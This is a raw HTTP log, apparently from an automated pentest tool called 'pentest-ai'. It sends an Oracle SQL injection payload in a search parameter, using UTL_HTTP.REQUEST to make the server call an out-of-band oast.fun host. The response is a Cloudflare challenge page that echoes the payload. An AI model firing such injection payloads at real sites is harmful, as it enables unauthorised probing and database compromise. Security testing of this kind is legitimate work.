REQUEST:
GET https://my.myfirst.tech/search?name=%27%20%7C%7C%20%28SELECT%20UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%2F%27%29%20FROM%20dual%29%20%7C%7C%20%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9766
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8474d3ddca110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=aEC2CK41UKIcQAboPDMTIv36znxg80RehUhBBMD3e9r2BlcjeaDgEl%2BywrcS55aLYAQYueOPOS4PP35SE9q%2FNElq9Tpb%2FmtjXKL49FVjQqsohkRbruBgSU9N%2B5QLbKcYf%2Fo9e49j2Cd4FS1%2Bdw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8474d3ddca110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'aF6iT5bxEL462FQGjTD2WBi8zzB5C0.QPLxXTwlqw7s-1784281156-1.2.1.1-._lVkhidHdM9sSrCmyl_B1TAhjpwQ.I2zLB_4SYvcZAs4nzaOmrmrJL0JC567W_5',cITimeS: '1784281156',cRay: 'a1c8474d3ddca110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?name=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_tk=pG_f3aP5IbhgtBbLEdYQaMi5iB7bHgItl9QJzXDCjBQ-1784281156-1.0.1.1-gfW7Td3aMBWXBUZ3jpso_0ByD2nAAogwl8Ux6qean3Y",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?name=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_f_tk=pG_f3aP5IbhgtBbLEdYQaMi5iB7bHgItl9QJzXDCjBQ-1784281156-1.0.1.1-gfW7Td3aMBWXBUZ3jpso_0ByD2nAAogwl8Ux6qean3Y",md: 'T9omXpRTWQUTDCRrKcuIzQ4JvT.RIhUwHuMxB5s_6p0-1784281156-1.2.1.1-AoEBQk7BrH8.2ijQZQ_matjfpouvbySb8h6YLu_PUiTSvclMcIWL0RPP_ZbtDj.Feo5Z3fF6v9JiK0v.7DLhR84nxMlYVS6D8TjZJsiM7jOjwZP9ODPVeMweTYYtdKmBvLjDVHnBy8GLFn_XnqxTSNNZFSLruLd.5CNF_TtaBHOirjs.DtjN1OrzP0RW.uF_obKF.ikMYDMQOH8jwKR7lNPVmHyE_gp.BaijH8pcF.KpzPaf15CmlGRG9qBhHhq3.gVg1lYJl7eiWfYKJ2pfzZ2YbPhjWHASmMUlzlbWaXm9zMV8kNpnRLzZ5tDIMC.pJ5.IOX.KmKv3ktm.v2uKKc.C0hICTzOx7O35R3kHUUV.MhydGo83ZQ4Yz18lVEFJPqIxIXSzkZiC0bo_LrJHOdR2AirkAMUqMql9f8i1jaRG_qMrEexU2BH3jVN4C7QDVCe3MF.2uVo5YfGLyR02GoyWinfgkJpml4oBV_HjRkkjKL_oPom3kxiCMAd76F0eJqr4.O3t_Chc5ig9PYDkK.v0e5lTgn3NArr2bHVlHn0eOp1suIvYShP3G9uHPZ.2kTwFYbvRGheTwoN9pzlrNWq.XJ.TQPosxwQrGfhsfsJrLVFGn7WV1hMlAo8lySd5Q91e6vQk88EXQwCrSXKLDyeitCnABoFXMkgIpXfM8IrBq67Wmhf7EZ8OhJBsEdaEEeQiZWCYk.Q_6CA5wkvWUHoYXhgpalfCf6IIj.fAt71vMKHa5XyUw4Kav4kAm6I7UplIMX5qbDySGLQeFlr5tE7auLuwCt1WoZLdSYaK2zUo9.S5y8o5oJ7BZpB73dETdUIB80PsEzldDJ_VA7OJw9QMnF5wjW01DswXyPMAdw1G3i7QvZURWwaPb9eQcLHOEmRp69qW5oCEkiNIuoa5rKAw..VHo6wIFGEDV2jQqclLdVS5PqBKfx7Jg_AcHGJaq85rtJESDxXFTRGVHYtqLtIq.8mwhEQ602hF9Lec.lMZnLUPRmiWliBglbWYNfv3jkMVngb7rxuaDqEy_sWHhaWPMnPBukw3i7FEVlh4D_8h.lntFGEJOxvTY51mzC.AtsP3uRzMlFKPdSMwsZULUwR7BrnCXEwpFVpT2e2Sr0QeQYPhvQgGeqT5VfIYfUihnpY1BdalIZtaWyBxbaYbwL8yVif1xpzE5v7Lsw_pYA9bVRNB.t.ecKwEWNxRHW2lUjkQIvBzd5hTRHMBLyf8AWxlWJoAT14wXEEOToX5Pemf4Nh_AlgDFLcaGcx_dowXSIzaxPNpvE199MQO8eDtai6gdVBjUenihln2Ebt5t5o',mdrd: 'E3cySUPSXnJAUH7b_U.BDnYt74I4379jlKD0cVidpqU-1784281156-1.2.1.1-03dw5DGpSlrMPsBKYNzLCZKr1nFF.GeU6eHpta2UaV9.2uXM0Yef9P4kYu3mdSnlL9AZZpUpUh5HarB5gBrrqxyAdw0UzJYlMIcYwTo1onyeFxw55KmBY.9ZDX02WDaU2ysJdWwT3Rb8M1OG8cfQ6Ad.OHx8puZG7sGIhxGl7Ale39DCi1wk4wbCCU93BUh0j5thBcN0LAUS.jbidvUwb6um0Hwj2VV_pGsTzChiuqUoZKsk0q9542i8cwoKIbzI',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8474d3ddca110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?name=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zypg2g2vx1775v.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_rt_tk=pG_f3aP5IbhgtBbLEdYQaMi5iB7bHgItl9QJzXDCjBQ-1784281156-1.0.1.1-gfW7Td3aMBWXBUZ3jpso_0ByD2nAAogwl8Ux6qean3Y"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
